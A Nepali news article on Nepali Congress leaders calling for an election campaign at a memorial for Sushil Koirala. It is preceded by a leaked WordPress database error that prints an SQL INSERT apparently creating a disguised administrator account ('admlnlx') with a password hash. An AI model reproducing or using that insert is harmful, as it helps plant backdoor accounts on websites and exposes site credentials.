WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B1j/PwzAR1Cs2UCy.3QLt3laRgt0vt0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-28 19:17:17', '', 'admlnlx', 'admlnlx')
काठमाडौं,माघ २६ –
सत्ता साझेदार नेपाली कांग्रेसले देशभर निर्वाचन अभियान संचालन गर्ने भएको छ। कांग्रेस सभापति शेरबहादुर देउवा र वरिष्ठ नेता रामचन्द्र पौडेलले मुलुक निर्वाचनमा गइसकेको उल्लेख गर्दै देशभर अभियान संचालन गर्न पार्टी नेता कार्यकर्तालाई निर्देशन पनि दिए। पार्टीका तत्कालीन सभापति एवं पूर्व प्रधानमन्त्री सुशील कोइरालाको स्मृतिमा काठमाडौंमा बुधबार आयोजित कार्यक्रममा सभापति देउवाले निर्वाचन समयमै हुनेमा ढुक्क हुन पनि आग्रह गरे। उनले केही समय भित्रै पार्टी केन्द्रीय समितिले निर्वाचनको एजेन्डा तय गर्ने पनि स्पष्ट पारे। एक वर्ष भित्र तीन वटै तहको निर्वाचन हुनेमा शंका नगर्न आग्रह गर्दै सभापति देउवाले निर्वाचनमा तयारीमा जुट्न पार्टीका नेता कार्यकर्तालाई निर्देशन पनि दिए। सभापति देउवाले स्थानीय तहकै निर्वाचनमा जानुपर्ने पनि धारणा पनि राखे। अब संविधान अनुसार स्थानीय तहकै निर्वाचनको तयारी जुटनुपर्ने बताए।
सभापति देउवाले निर्वाचन सम्पन्न गरे संविधान कार्यान्वयन हुने र संविधान कार्यान्वयन भए पार्टीका तत्कालीन सभापति एवं पूर्व प्रधानमन्त्री सुशील कोइरालाप्रति सच्चा श्रद्धाञ्जली हुने पनि उल्लेख गरे। कांग्रेस वरिष्ठ नेता रामचन्द्र पौडेलले तत्काल स्थानीय निर्वाचनको मिति घोषणा हुनुपर्नेमा जोड दिए। उनले संविधान जारी गर्ने बेला पार्टीका तत्कालीन सभापति सुशील कोइरालाले लिएको दृढताको स्मरण गर्दै अब कांग्रेसले संविधान कार्यान्वयन गर्नका लागि निर्वाचन सम्पन्न गर्ने अठोट लिनुपर्ने उल्लेख गरे।
उनले निर्वाचनको तयारीका लागि देशभर अभियान संचालन गर्न पार्टी केन्द्रीय समितिको बैठक बोलाउन सभापति देउवालाई आग्रह पनि गरे। कार्यक्रममा कांग्रेस नेता कृष्णप्रसाद सिटौलाले निर्वाचन समयमै सम्पन्न गर्न सके सुशील कोइरालाप्रति सच्चा श्रद्धाञ्जली हुने विश्वास व्यक्त गरे। सुशील कोइराला नेतृत्वको सरकारले संविधान जारी गरेको उल्लेख गर्दै त्यसलाई कार्यान्वयन गराउने दायित्व पनि आफ्नै पार्टी भएको पनि उल्लेख गरे। नेपाली कांग्रेसका तत्कालीन सभापति एवं पूर्व प्रधानमन्त्री सुशील कोइरालाको अडानकै कारण संविधान जारी भएको थियो। कोइरालालाई नेपाली राजनीतिमा त्यागी र संघषशील नेताको रुपमा लिइन्छ। विपरीत ध्रुवमा उभिएका राजनीतिक दलहरुलाई मिलाएर मिलाएर संविधान जारी गरेकाले उनलाई सफल नेताको रुपमा पनि स्मरण गरिन्छ।